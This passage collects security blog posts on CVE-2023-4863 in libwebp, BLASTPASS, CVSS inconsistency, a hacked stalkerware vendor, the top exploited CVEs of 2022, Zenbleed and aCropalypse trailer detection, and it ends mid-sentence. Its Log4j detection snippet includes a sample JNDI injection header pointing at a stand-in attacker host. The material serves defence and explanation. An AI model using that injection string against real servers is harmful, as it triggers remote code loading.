If you’re interested in finding out more, we have a webinar coming up with more details on the zero-day and how to respond; you can register here. We also cover the technical details of the attack in a separate blog post: HTTP/2 Rapid Reset: deconstructing the record-breaking attack. Finally, if you’re being targeted or need immediate protection, please contact your local Cloudflare representative or visit https://www.cloudflare.com/under-attack-hotline/.

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed

Post Syndicated from Willi Geiger original http://blog.cloudflare.com/uncovering-the-hidden-webp-vulnerability-cve-2023-4863/

At Cloudflare, we're constantly vigilant when it comes to identifying vulnerabilities that could potentially affect the Internet ecosystem. Recently, on September 12, 2023, Google announced a security issue in Google Chrome, titled "Heap buffer overflow in WebP in Google Chrome," which caught our attention. Initially, it seemed like just another bug in the popular web browser. However, what we discovered was far more significant and had implications that extended well beyond Chrome.

Impact much wider than suggested

The vulnerability, tracked under CVE-2023-4863, was described as a heap buffer overflow in WebP within Google Chrome. While this description might lead one to believe that it's a problem confined solely to Chrome, the reality was quite different. It turned out to be a bug deeply rooted in the libwebp library, which is not only used by Chrome but by virtually every application that handles WebP images.

Digging deeper, this vulnerability was in fact first reported in an earlier CVE from Apple, CVE-2023-41064, although the connection was not immediately obvious. In early September, Citizen Lab, a research lab based out of the University of Toronto, reported on an apparent exploit that was being used to attempt to install spyware on the iPhone of "an individual employed by a Washington DC-based civil society organization." The advisory from Apple was also incomplete, stating that it was a “buffer overflow issue in ImageIO,” and that they were aware the issue may have been actively exploited. Only after Google released CVE-2023-4863 did it become clear that these two issues were linked, and there was a wider vulnerability in WebP.

The vulnerability allows an attacker to create a malformed WebP image file that makes libwebp write data beyond the buffer memory allocated to the image decoder. By writing past the legal bounds of the buffer, it is possible to modify sensitive data in memory, eventually leading to execution of the attacker's code.

WebP, introduced over a decade ago, has gained widespread adoption in various applications, ranging from web browsers to email clients, chat apps, graphics programs, and even operating systems. This ubiquity meant that this vulnerability had far-reaching consequences, affecting a vast array of software and virtually all users of the WebP format.

How the WebP vulnerability is exploited

Understanding the technical details

So what exactly was the issue, how could it be exploited, and how was it shut down? We can get our best clues by looking at the patch that was made to libwebp. This patch fixes a potential out-of-bounds (OOB) write in part of the image decoder – the Huffman tables – with two changes: additional validation of the input data, and a modified dynamic memory allocation model. A deeper dive into libwebp and the WebP image format built on top of it reveals what this means.

WebP is a combination of two different image formats: a lossy format similar to JPEG using the VP8 codec, and a lossless format using WebP's custom lossless codec. The bug was in the lossless codec's handling of Huffman coding.

The fundamental idea behind Huffman coding is that using a constant number of bits for every basic unit of information in a dataset – like a pixel color – is not the most efficient representation. We can use a variable number of bits, assigning the shortest sequences to the most frequently occurring values and longer ones to the least common values. The sequences of ones and zeros can be represented as a binary tree, with the shorter, more common codes near the root, and longer, less common codes deeper in the tree. Looking up values in the tree bit by bit is relatively slow. Practical implementations build lookup tables that allow matching many bits at a time.

Image files contain compact information about the shape of the Huffman tree, which the decoder uses to reconstruct the tree, and build lookup tables for the codes. The bug in libwebp was in the code building the lookup tables. A specially crafted WebP file can contain a very unbalanced Huffman tree that contains codes much longer than any normal WebP file would have, and this made the function generating lookup tables write data beyond the buffer allocated for the lookup tables. Libwebp had checks for validity of the Huffman tree, but it would write the invalid lookup tables before the consistency check.
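
To get a feel for why long codes matter, consider how a decoder typically sizes a two-level lookup table from the code lengths stored in the file. The following sketch is a simplified model of that idea, not libwebp's actual table-building code; the exact layout and constants in libwebp differ.

    ROOT_BITS = 8  # first-level table indexed by the next 8 bits of input

    def table_slots_needed(code_lengths: list[int]) -> int:
        """Root table plus a second-level block for every code longer than ROOT_BITS."""
        slots = 1 << ROOT_BITS
        for length in code_lengths:
            if length > ROOT_BITS:
                slots += 1 << (length - ROOT_BITS)
        return slots

    def is_complete_prefix_code(code_lengths: list[int]) -> bool:
        """Kraft check: the lengths describe a complete prefix code iff the sum is 1."""
        return sum(2.0 ** -length for length in code_lengths if length > 0) == 1.0

    # A balanced tree: 256 symbols, all 8 bits long, fits entirely in the root table.
    balanced = [8] * 256
    print(table_slots_needed(balanced), is_complete_prefix_code(balanced))      # 256 True

    # A valid but extremely unbalanced tree with codes up to 15 bits long needs
    # far more slots. The libwebp bug was writing table entries derived from the
    # file's code lengths before fully validating them against the space that had
    # been allocated; the fix validates first and sizes the buffer to match.
    unbalanced = [1] + list(range(2, 16)) + [15]
    print(table_slots_needed(unbalanced), is_complete_prefix_code(unbalanced))  # 638 True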

The buffer for lookup tables is allocated on the heap. The heap is an area of memory where most of the application's data is stored. Code that writes data past its buffer allows attackers to modify and corrupt data that happens to be adjacent in memory to the buffer. This can be exploited to make the application misbehave, and eventually start executing code supplied by the attacker.

The fixed version of libwebp first checks that the input data creates a valid internal structure and, if it does, allocates more memory when necessary to ensure the buffer is always big enough.

Libwebp is a mature library, maintained by seasoned professionals. But it's written in the C language, which has very few safeguards against programming errors, especially memory use. Despite the care taken in the library's development, a single erroneous assumption led to a critical vulnerability.

Swift action

On the same day that Google's announcement caught our attention, we filed an internal security ticket, to document and address the vulnerability.

Google was initially perplexed about the true source of the problem. They did not release a patched version of libwebp before announcing the vulnerability. We discovered the yet-unreleased patch for libwebp in its repository, and used it to update libwebp in our services. libwebp officially released the patch a day later.

Our image processing services are written in Rust. We've submitted patches to Rust packages that contained a copy of libwebp and filed RustSec advisories for them (RUSTSEC-2023-0061 and RUSTSEC-2023-0062). This ensured that the broader Rust ecosystem was informed and could take appropriate action.

In an interesting turn of events, GitHub's vulnerability scanner was quick to recognize our RustSec reports as the first case of CVE-2023-4863, even before the issue gained widespread attention. This highlights the importance of having robust security reporting mechanisms in place and the vital role that platforms like GitHub play in keeping the open-source community secure.

These quick actions demonstrate how seriously Cloudflare takes this kind of threat. We have a belt-and-suspenders approach to security that limits the binaries we run at our edge to those signed by us, and ensures that all vulnerabilities are identified and remedied as soon as possible. In this case, we have scrutinized our logs, and found no evidence that any attackers attempted to leverage this vulnerability against Cloudflare. We believe this exploit targeted individuals rather than the infrastructure of a company like Cloudflare, but we never take chances with our customers’ data, and so fixed this vulnerability as quickly as possible, before it became well known.

Conclusion

Google has now widened its description of this issue, correctly calling out that all uses of WebP are potentially affected. This widened description was originally filed as yet another new CVE – CVE-2023-5129 – but then that was flagged as a duplicate of the original CVE-2023-4863, and the description of the earlier filing updated. This incident serves as a reminder of the complex and interconnected nature of the internet ecosystem. What initially seemed like a Chrome-specific problem revealed a much deeper issue that touched nearly every corner of the digital world. The incident also showcased the importance of swift collaboration and the critical role that responsible disclosure plays in mitigating security risks.

For each and every user, it demonstrates the need to keep all browsers, apps and operating systems up to date, and to install recommended security patches. All applications supporting WebP images need to be updated. We've updated our services.

At Cloudflare, we remain committed to enhancing the security of the internet, and incidents like these drive us to continually refine our processes and strengthen our partnerships within the global developer community. By working together, we can make the Internet a safer place for everyone.

Critical Vulnerability in libwebp Library

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/critical-vulnerability-in-libwebp-library.html

Both Apple and Google have recently reported critical vulnerabilities in their systems—iOS and Chrome, respectively—that are ultimately the result of the same vulnerability in the libwebp library:

On Thursday, researchers from security firm Rezillion published evidence that they said made it “highly likely” both indeed stemmed from the same bug, specifically in libwebp, the code library that apps, operating systems, and other code libraries incorporate to process WebP images.

Rather than Apple, Google, and Citizen Lab coordinating and accurately reporting the common origin of the vulnerability, they chose to use a separate CVE designation, the researchers said. The researchers concluded that “millions of different applications” would remain vulnerable until they, too, incorporated the libwebp fix. That, in turn, they said, was preventing automated systems that developers use to track known vulnerabilities in their offerings from detecting a critical vulnerability that’s under active exploitation.

Zero-Click Exploit in iPhones

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/zero-click-exploit-in-iphones.html

Make sure you update your iPhones:

Citizen Lab says two zero-days fixed by Apple today in emergency security updates were actively abused as part of a zero-click exploit chain (dubbed BLASTPASS) to deploy NSO Group’s Pegasus commercial spyware onto fully patched iPhones.

The two bugs, tracked as CVE-2023-41064 and CVE-2023-41061, allowed the attackers to infect a fully-patched iPhone running iOS 16.6 and belonging to a Washington DC-based civil society organization via PassKit attachments containing malicious images.

“We refer to the exploit chain as BLASTPASS. The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim,” Citizen Lab said.

“The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim.”

Inconsistencies in the Common Vulnerability Scoring System (CVSS)

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/inconsistencies-in-the-common-vulnerability-scoring-system-cvss.html

Interesting research:

Shedding Light on CVSS Scoring Inconsistencies: A User-Centric Study on Evaluating Widespread Security Vulnerabilities

Abstract: The Common Vulnerability Scoring System (CVSS) is a popular method for evaluating the severity of vulnerabilities in vulnerability management. In the evaluation process, a numeric score between 0 and 10 is calculated, 10 being the most severe (critical) value. The goal of CVSS is to provide comparable scores across different evaluators. However, previous works indicate that CVSS might not reach this goal: If a vulnerability is evaluated by several analysts, their scores often differ. This raises the following questions: Are CVSS evaluations consistent? Which factors influence CVSS assessments? We systematically investigate these questions in an online survey with 196 CVSS users. We show that specific CVSS metrics are inconsistently evaluated for widespread vulnerability types, including Top 3 vulnerabilities from the “2022 CWE Top 25 Most Dangerous Software Weaknesses” list. In a follow-up survey with 59 participants, we found that for the same vulnerabilities from the main study, 68% of these users gave different severity ratings. Our study reveals that most evaluators are aware of the problematic aspects of CVSS, but they still see CVSS as a useful tool for vulnerability assessment. Finally, we discuss possible reasons for inconsistent evaluations and provide recommendations on improving the consistency of scoring.

Here’s a summary of the research.

Spyware Vendor Hacked

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/spyware-vendor-hacked.html

A Brazilian spyware app vendor was hacked by activists:

In an undated note seen by TechCrunch, the unnamed hackers described how they found and exploited several security vulnerabilities that allowed them to compromise WebDetetive’s servers and access its user databases. By exploiting other flaws in the spyware maker’s web dashboard—used by abusers to access the stolen phone data of their victims—the hackers said they enumerated and downloaded every dashboard record, including every customer’s email address.

The hackers said that dashboard access also allowed them to delete victim devices from the spyware network altogether, effectively severing the connection at the server level to prevent the device from uploading new data. “Which we definitely did. Because we could. Because #fuckstalkerware,” the hackers wrote in the note.

The note was included in a cache containing more than 1.5 gigabytes of data scraped from the spyware’s web dashboard. That data included information about each customer, such as the IP address they logged in from and their purchase history. The data also listed every device that each customer had compromised, which version of the spyware the phone was running, and the types of data that the spyware was collecting from the victim’s phone.

Unmasking the top exploited vulnerabilities of 2022

Post Syndicated from Himanshu Anand original http://blog.cloudflare.com/unmasking-the-top-exploited-vulnerabilities-of-2022/

The Cybersecurity and Infrastructure Security Agency (CISA) just released a report highlighting the most commonly exploited vulnerabilities of 2022. With our role as a reverse proxy to a large portion of the Internet, Cloudflare is in a unique position to observe how the Common Vulnerabilities and Exposures (CVEs) mentioned by CISA are being exploited on the Internet.

We wanted to share a bit of what we’ve learned.

Based on our analysis, two CVEs mentioned in the CISA report are responsible for the vast majority of attack traffic seen in the wild: Log4J and Atlassian Confluence Code Injection. Although CISA/CSA discuss a larger number of vulnerabilities in the same report, our data clearly suggests a major difference in exploit volume between the top two and the rest of the list.

The top CVEs for 2022

Looking at the volume of requests detected by WAF Managed Rules that were created for the specific CVEs listed in the CISA report, we rank the vulnerabilities in order of prevalence:

1. Log4J: improper input validation leading to remote code execution in the Apache Log4j logging library (CVE-2021-44228)
2. Atlassian Confluence Code Injection: Atlassian Confluence Server and Data Center remote code execution vulnerability (CVE-2022-26134)
3. Microsoft Exchange servers (ProxyShell): three issues combined to achieve remote code execution (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523)
4. BIG-IP F5: undisclosed requests may bypass iControl REST authentication and run arbitrary code (CVE-2022-1388)
5. VMware: two issues combined to achieve remote root (CVE-2022-22954, CVE-2022-22960)
6. Atlassian Confluence 0-day: remote code execution issue in Confluence Server and Data Center (CVE-2021-26084)

Topping the list is Log4J (CVE-2021-44228). This isn’t surprising, as it is likely one of the highest-impact exploits we have seen in decades — leading to full remote compromise. The second most exploited vulnerability is the Atlassian Confluence Code Injection (CVE-2022-26134).

In third place we find the combination of three CVEs targeting Microsoft Exchange servers (CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523). In fourth is a BIG-IP F5 exploit (CVE-2022-1388) followed by the combination of two VMware vulnerabilities (CVE-2022-22954 and CVE-2022-22960). Our list ends with another Atlassian Confluence 0-day (CVE-2021-26084).

When comparing the attack volume for these groups, we immediately notice that one vulnerability stands out. Log4J is more than an order of magnitude more exploited than the runner-up (Atlassian Confluence Code Injection), and all the remaining CVEs are lower still. Although the CISA/CSA report groups all these vulnerabilities together, we think that there are really two groups: one dominant CVE (Log4J), and a secondary group of comparable 0-days. Each of the two groups has a similar attack volume.

The chart below, in logarithmic scale, clearly shows the difference in popularity.

CVE-2021-44228: Log4J

The first on our list is the notorious CVE-2021-44228 — better known as the Log4j vulnerability. This flaw caused significant disturbance in the cyber world in 2021, and continues to be exploited extensively.

Cloudflare released new managed rules within hours of the vulnerability being made public, and released updated detections in the following days. Overall, we released rules in three stages.

The rules we deployed detect the exploit in four categories:

  • Log4j Headers: attack pattern in HTTP headers
  • Log4j Body: attack pattern in the HTTP body
  • Log4j URI: attack pattern in the URI
  • Log4j Body Obfuscation: obfuscated attack pattern

We have found that Log4J attacks in HTTP headers are more common than in HTTP bodies. The graph below shows the persistence of exploit attempts for this vulnerability over time, with clear peaks and continued growth into July 2023 (time of writing).
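
As a deliberately simplified illustration of what such detections look for (and not a reproduction of Cloudflare's managed rules), the sketch below scans request headers and body for the basic JNDI lookup marker. Real rules also have to handle nested and obfuscated variants, which this pattern will miss.

    import re

    # Matches only the plain "${jndi:" form. Obfuscated variants such as
    # ${${lower:j}ndi:...} require far more elaborate rules than this.
    JNDI_PATTERN = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)

    def log4j_probe_locations(headers: dict[str, str], body: str) -> list[str]:
        """Return which parts of a request match the basic pattern."""
        findings = [f"header:{name}" for name, value in headers.items()
                    if JNDI_PATTERN.search(value)]
        if JNDI_PATTERN.search(body):
            findings.append("body")
        return findings

    # The User-Agent header is a common injection point for this exploit.
    example_headers = {"User-Agent": "${jndi:ldap://attacker.example/a}"}
    print(log4j_probe_locations(example_headers, body=""))  # ['header:User-Agent']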

Due to the high impact of this vulnerability, and to step up and lead the charge for a safer, better Internet, on March 15, 2022, Cloudflare announced that all plans (including Free) would get WAF Managed Rules for high-impact vulnerabilities. These free rules tackle high-impact vulnerabilities such as the Log4J exploit, the Shellshock vulnerability, and various widespread WordPress exploits. Every business or personal website, regardless of size or budget, can protect their digital assets using Cloudflare’s WAF.

The full security advisory for Log4J published by the Apache Software Foundation can be found here.

CVE-2022-26134: Atlassian Confluence Code Injection

A code injection vulnerability that afflicted Atlassian Confluence was the second most exploited CVE in 2022. This exploit posed a threat to entire systems, leaving many businesses at the mercy of attackers. This is an indication of how critical knowledge-based systems have become in managing information within organizations. Attackers are targeting these systems as they recognize how important they are. In response, the Cloudflare WAF team rolled out two emergency releases to protect its customers.

As part of these releases, two rules were made available to all WAF users:

  • Atlassian Confluence – Code Injection – CVE:CVE-2022-26134
  • Atlassian Confluence – Code Injection – Extended – CVE:CVE-2022-26134

The graph below displays the number of hits received each day, showing a clear peak followed by a gradual decline as systems were patched and secured.

Both Log4J and Confluence Code Injection show some seasonality, with a higher volume of attacks carried out from around September-November 2022 through March 2023. This likely reflects campaigns run by attackers who are still attempting to exploit this vulnerability (an ongoing campaign is visible towards the end of July 2023).

Security advisory for reference.

CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523: Microsoft Exchange SSRF and RCE Vulnerabilities

Three previously unknown bugs were chained together to achieve a Remote Code Execution (RCE) 0-day attack. Given how widely adopted Microsoft Exchange servers are, these exploits posed serious threats to data security and business operations across all industries, geographies and sectors.

Cloudflare WAF published a rule for this vulnerability with the Emergency Release of March 3, 2022, which contained the rule Microsoft Exchange SSRF and RCE vulnerability – CVE:CVE-2022-41040, CVE:CVE-2022-41082.

The trend of these attacks over the past year can be seen in the graph below.

Security advisories for reference: CVE-2021-34473, CVE-2021-31207 and CVE-2021-34523.

CVE-2022-1388: RCE in BIG-IP F5

This particular security vulnerability can be exploited when an unauthenticated adversary has network connectivity to the BIG-IP system (the F5 product name for a group of application security and performance solutions). Via either the management interface or self IP addresses, the attacker can execute unrestricted system commands.

Cloudflare did an emergency release to detect this issue (Emergency Release: May 5, 2022) with the rule Command Injection – RCE in BIG-IP – CVE:CVE-2022-1388.

There is a relatively persistent pattern of exploitation without signs of specific campaigns, with the exception of a spike occurring in late June 2023.

F5 security advisory for reference.

CVE-2022-22954: VMware Workspace ONE Access and Identity Manager Server-side Template Injection Remote Code Execution Vulnerability

With this vulnerability, an attacker can remotely trigger a server-side template injection that may result in remote code execution. Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the VMware user. Later, this issue was combined with CVE-2022-22960, a Local Privilege Escalation (LPE) vulnerability. In combination, these two vulnerabilities allowed remote attackers to execute commands with root privileges.

Cloudflare WAF published a rule for this vulnerability in the May 5, 2022 release. The graph of exploit attempts over time is shown below.

VMware Security advisory.

CVE-2021-26084: Confluence Server Webwork OGNL injection

An OGNL injection vulnerability was found that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. Cloudflare WAF performed an emergency release for this vulnerability on September 9, 2022. Compared to the other CVEs discussed in this post, we have not observed many exploit attempts over the past year.

Official security advisory.

Recommendations for enhanced protection

We recommend that all server administrators keep their software updated when fixes become available. Cloudflare customers — including those on our free tier — can leverage new rules addressing CVEs and 0-day threats, updated weekly in the Managed Ruleset. High-risk CVEs may even prompt emergency releases. In addition to this, Enterprise customers have access to the WAF Attack Score: an AI-powered detection feature that supplements traditional signature-based rules, identifying unknown threats and bypass attempts. With the combined strength of rule-based and AI detection, Cloudflare offers robust defense against known and emerging threats.

Conclusions

Cloudflare’s data is able to augment CISA’s vulnerability report — of note, we see exploit attempts against the top two vulnerabilities that are several orders of magnitude more frequent than those against the remainder of the list. Organizations should focus their software patching efforts based on the list provided. It is, of course, important to note that all software should be patched, and a good WAF implementation will provide additional security and “buy time” for underlying systems to be secured against both existing and future vulnerabilities.

How Cloudflare is staying ahead of the AMD Zen vulnerability known as “Zenbleed”

Post Syndicated from Derek Chamorro original http://blog.cloudflare.com/zenbleed-vulnerability/

Google Project Zero revealed a new flaw in AMD's Zen 2 processors in a blog post today. The 'Zenbleed' flaw affects the entire Zen 2 product stack, from AMD's EPYC data center processors to the Ryzen 3000 CPUs, and can be exploited to steal sensitive data stored in the CPU, including encryption keys and login credentials. The attack can even be carried out remotely through JavaScript on a website, meaning that the attacker need not have physical access to the computer or server.

Cloudflare’s network includes servers using AMD’s Zen line of CPUs. We have patched our entire fleet of potentially impacted servers with AMD’s microcode to mitigate this potential vulnerability. While our network is now protected from this vulnerability, we will continue to monitor for any signs of attempted exploitation of the vulnerability and will report on any attempts we discover in the wild. To better understand the Zenbleed vulnerability, read on.

Background

Understanding how a CPU executes programs is crucial to comprehending the attack's workings. The CPU contains an arithmetic logic unit (ALU), which is used to perform mathematical tasks. Operations like addition, multiplication, and floating-point calculations fall under this category. The CPU's clock signal controls the digital circuitry that the ALU uses to carry out these functions.

For data to reach the ALU, it has to pass through a series of storage systems. These include secondary memory, primary memory, cache memory, and CPU registers. Since the registers of the CPU are the target of this attack, we will go into a little more depth. Depending on the design of the computer, the CPU registers can store either 32 or 64 bits of information. The ALU can access the data in these registers and complete the operation.

As the demands on CPUs have increased, there has been a need for faster ways to perform calculations. Advanced Vector Extensions (AVX) were developed to speed up the processing of large data sets by applications. AVX is a set of extensions to the x86 instruction set architecture, relevant to x86-based CPUs from Intel and AMD. With the help of compatible software and the extra instructions, supporting processors can handle more complex tasks. The primary motivation for developing this instruction set was to speed up operations associated with data compression, image processing, and cryptographic computations.

The vector data used by AVX instructions is stored in 16 YMM registers, each of which is 256 bits in size. The lower 128 bits of each YMM register are the corresponding XMM register from the earlier SSE extensions, which is where the name comes from. Arithmetic and logic instructions in the AVX extensions make use of the YMM registers. They can also be used to hold masks: data that is used to filter out certain vector components.

Vectorized operations can be executed with great efficiency using the YMM registers. Applications that process large amounts of data stand to gain significantly from them, but they are increasingly the focus of malicious activity.
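
To make this concrete, here is a minimal sketch in Rust of an operation that uses the 256-bit YMM registers, assuming an x86_64 CPU; the function, its name, and the scalar fallback are illustrative only and are not taken from any code discussed in this post. Eight 32-bit floats are loaded into YMM registers, added with a single AVX instruction, and stored back.

// Minimal sketch: add eight f32 values at once using 256-bit YMM registers.
// Assumes an x86_64 target; falls back to a scalar loop if AVX is absent.
#[cfg(target_arch = "x86_64")]
fn add_eight_floats(a: [f32; 8], b: [f32; 8]) -> [f32; 8] {
    let mut out = [0.0f32; 8];
    if is_x86_feature_detected!("avx") {
        unsafe {
            use std::arch::x86_64::*;
            // Each __m256 value occupies one YMM register.
            let va = _mm256_loadu_ps(a.as_ptr());
            let vb = _mm256_loadu_ps(b.as_ptr());
            let sum = _mm256_add_ps(va, vb);
            _mm256_storeu_ps(out.as_mut_ptr(), sum);
        }
    } else {
        for i in 0..8 {
            out[i] = a[i] + b[i];
        }
    }
    out
}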

The attack

Speculative execution attacks have previously been used to compromise CPU registers. These attacks take advantage of the speculative execution capabilities of modern CPUs. Processors use a method called speculative execution to speed up processing: a CPU will execute an instruction speculatively before it knows for certain whether the instruction is actually needed. If it turns out the instruction was not needed, the CPU simply discards its results.

Because of their potential use for storing private information, AVX registers are especially susceptible to these kinds of attacks. Cryptographic keys and passwords, for instance, could be accessed by an attacker via a speculative execution attack on the AVX registers.

As mentioned above, Project Zero discovered a vulnerability in AMD's Zen 2-architecture-based CPUs, wherein data from another process and/or thread could be stored in the YMM registers, a set of 256-bit extended registers, potentially allowing an attacker access to sensitive information. This vulnerability is caused by a register not being written to 0 correctly under specific microarchitectural circumstances. Although this error is associated with speculative execution, it is not a side channel vulnerability.

This attack works by manipulating register files to force a mispredicted command. First, there is a trigger of the XMM Register Merge Optimization (which, ironically, is a hardware mitigation that can be used to protect against speculative execution attacks), followed by register renaming (a technique used in processor design to resolve name conflicts between physical and logical registers), and finally a mispredicted call to vzeroupper, an instruction that is used to zero the upper half of the YMM and ZMM registers.

Since the register file is shared by all the processes running on the same physical core, this exploit can be used to eavesdrop on even the most fundamental system operations by monitoring the data being transferred between the CPU and the rest of the computer.

Fixing the bleed

Because of the exact timing required for this to execute successfully, this vulnerability, CVE-2023-20593, is classified with a CVSS score of 6.5 (Medium). AMD's mitigation is implemented via an MSR (model-specific register) setting, which turns off a floating point optimization that otherwise would have allowed the problematic move operation.

Microcode updates have been applied to all servers in our fleet that contain potentially affected AMD Zen processors. We have seen no evidence of the bug being exploited and were able to patch our entire network within hours of the vulnerability’s disclosure. We will continue to monitor traffic across our network for any attempts to exploit the bug and report on our findings.

How Cloudflare Images addressed the aCropalypse vulnerability

Post Syndicated from Nicholas Skehin original http://blog.cloudflare.com/how-cloudflare-images-addressed-the-acropalypse-vulnerability/

Acropalypse (CVE-2023-21036) is a vulnerability caused by image editing tools failing to truncate images when editing has made them smaller, most often seen when images are cropped. This leaves remnants of the original contents in the file after the edited image data ends. The remnants (written in a ‘trailer’ after the end-of-image marker) are ignored by most software when reading the image, but can be used by an attacker to partially reconstruct the original image.

The general class of vulnerability can, in theory, affect any image format if it ignores data written after the end of the image. In this case the applications affected were the ‘Markup’ screenshot editor that shipped with Google Pixel phones from the Pixel 3 (saving its images in the PNG format) and the Windows Snipping tool (with both PNG and JPEG formats).

Our customers deliver their images using Cloudflare Images products and may have images that are affected. We would like to ensure their images are protected from this vulnerability if they have been edited using a vulnerable editor.

As a concrete example, imagine a Cloudflare customer running a social network, delivering images using Cloudflare Images. A user of the social network might take a screenshot of an invoice containing their address after ordering a product, crop their address out and share the cropped image on the social network. If the image was cropped using an editor affected by aCropalypse an attacker would be able to recover their address, violating their expectation of privacy.

How Cloudflare Images products work

Cloudflare Images and Image Resizing use a proxy as the upstream for requests. This proxy fetches the original image (from either Cloudflare Images storage or the customer’s upstream), applies any transformations (from the variant definition for Cloudflare Images, or from the URL/worker parameters for Image Resizing) and then responds with the transformed image.

This naturally provides protection against aCropalypse for our customers: the proxy will ignore any trailing data in the input, so it won’t be present in the re-encoded image.

However, for certain requests, the proxy might respond with the original. This occurs when two conditions hold: the original can satisfy the request, and the re-encoded image has a larger file size. The original can satisfy the request if we can guarantee that whenever the requested format is supported the original format is also supported, it has the same dimensions, it doesn’t have any metadata that needs stripping, and no other transformations such as sharpening or overlays were requested.

Even if the original can satisfy the request, it is fairly unlikely the original will be smaller for images affected by aCropalypse as the leaked information in the trailer will increase the file size. So Cloudflare Images and Image Resizing should provide protection against aCropalypse without adding any additional mitigations.

That being said, we couldn’t guarantee that images affected by aCropalypse would always be re-encoded. We wanted to be able to offer this guarantee for customers of Cloudflare Images and Image Resizing.

How we addressed the issue for the JPEG and PNG file formats

To ensure that no images with a trailer will ever be passed through, we can add another requirement to reply with the original image — if the original image is a PNG or a JPEG (so might have been affected by aCropalypse), it must not have a trailer. Then we just need to be able to detect trailers for both formats.
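
As a rough sketch of that decision, the pass-through check described above might look something like the function below; all identifiers are invented for illustration and do not reflect the proxy's real internals, and the trailer detection itself is described next.

// Hypothetical sketch of the pass-through decision; all identifiers are
// invented for illustration and do not reflect the proxy's real internals.
fn should_serve_original(
    original_satisfies_request: bool,
    original_size: usize,
    reencoded_size: usize,
    is_png_or_jpeg: bool,
    has_trailer: bool,
) -> bool {
    original_satisfies_request
        // Only pass the original through when re-encoding produced a larger file.
        && original_size < reencoded_size
        // New requirement: never pass through a PNG or JPEG that carries
        // trailing data after its end-of-image marker.
        && !(is_png_or_jpeg && has_trailer)
}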

As a first idea we might consider simply checking that the image ends with the correct end-of-image marker, which for JPEG is the byte sequence [0xFF 0xD9] and for PNG is the byte sequence [0x00 0x00 0x00 0x00 0x49 0x45 0x4E 0x44 0xAE 0x42 0x60 0x82]. But this won’t work for images affected by aCropalypse: because the original image was a valid image, the trailer that results from overwriting the start of the file will be the end of a valid image. We also can’t check whether there is more than one end-of-image marker in the file; both formats have chunks of variable-length bytestrings in which the end-of-image marker could appear. We need to do it properly by parsing the image’s structure and checking there is no data after its end.

For JPEGs, we use a Rust wrapper of the library libjpeg-turbo for decoding. Libjpeg-turbo allows fine control of resource usage; for example it allows decompressing and re-compressing a JPEG file a scanline at a time. This flexibility allows us to easily detect trailers using the library’s API: we just have to check that once we have consumed the end-of-image marker all of the input has been consumed. In our proxy we use an in-memory buffer as input, so we can check that there are no bytes left in the buffer:

pub fn consume_eoi_marker(&mut self) -> bool {
    // Try to consume the EOI marker of the image
    unsafe {
        (ffi::jpeg_input_complete(&self.dec.cinfo) == 1) || {
            ffi::jpeg_consume_input(&mut self.dec.cinfo);
            ffi::jpeg_input_complete(&self.dec.cinfo) == 1
        }
    }
}

pub fn has_trailer(&mut self) -> io::Result<bool> {
    if self.consume_eoi_marker() {
        let src = unsafe {
            NonNull::new(self.dec.cinfo.src)
                .ok_or_else(|| {
                    io::Error::new(
                        io::ErrorKind::Other,
                        "source manager not set".to_string()
                    )
                })?
                .as_ref()
        };

        // We have a trailer if we have any bytes left over in the buffer
        Ok(src.bytes_in_buffer != 0)
    } else {
        // We didn't consume the EOI - we can't say if there is a trailer
        Err(io::Error::new(
            io::ErrorKind::Other,
            "EOI not reached".to_string(),
        ))
    }
}

For PNGs, we use the lodepng library. This has a much simpler API surface that decodes an image in one shot when you call lodepng_decode. This doesn’t tell us how many bytes were read or provide an interface to detect if we have a trailer.

Luckily the PNG format has a very consistent and simple internal structure:

  • First the PNG prelude, the byte sequence [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]
  • Then a series of chunks, which each consist of
  1. 4 bytes length as a big-endian integer N
  2. 4 bytes chunk type
  3. N bytes of data (whose meaning depends on the chunk type)
  4. 4 bytes of checksum — CRC-32 of the type and data

The file is terminated by a chunk of type IEND with no data.

As the format is so regular, it’s easy to write a separate parser that just reads the prelude, loops through the chunks until we see IEND, and then checks if we have any bytes left. We can perform this check after decoding the image with lodepng; this lets us skip validating the checksums, since lodepng has already checked them for us:

const PNG_PRELUDE: &[u8] = &[0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a];

enum ChunkStatus {
    SeenEnd { has_trailer: bool },
    MoreChunks,
}

fn consume_chunks_until_iend(buf: &[u8]) -> Result<(ChunkStatus, &[u8]), &'static str> {
    let (length_bytes, buf) = consume(buf, 4)?;
    let (chunk_type, buf) = consume(buf, 4)?;

    // Infallible: We've definitely consumed 4 bytes
    let length = u32::from_be_bytes(length_bytes.try_into().unwrap());

    let (_data, buf) = consume(buf, length as usize)?;

    let (_checksum, buf) = consume(buf, 4)?;

    if chunk_type == b"IEND" && buf.is_empty() {
        Ok((ChunkStatus::SeenEnd { has_trailer: false }, buf))
    } else if chunk_type == b"IEND" && !buf.is_empty() {
        Ok((ChunkStatus::SeenEnd { has_trailer: true }, buf))
    } else {
        Ok((ChunkStatus::MoreChunks, buf))
    }
}

pub(crate) fn has_trailer(png_data: &[u8]) -> Result<bool, &'static str> {
    let (magic, mut buf) = consume(png_data, PNG_PRELUDE.len())?;

    if magic != PNG_PRELUDE {
        return Err("expected prelude");
    }

    loop {
        let (status, tmp_buf) = consume_chunks_until_iend(buf)?;
        buf = tmp_buf;
        if let ChunkStatus::SeenEnd { has_trailer } = status {
            return Ok(has_trailer)
        }
    }
}
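
The snippets above call a small consume helper (not reproduced above) that splits off the first N bytes of a slice and fails if not enough bytes remain. A minimal sketch of what such a helper might look like, as an assumption rather than the actual implementation, is:

// Minimal sketch of the consume helper assumed by the code above: split off
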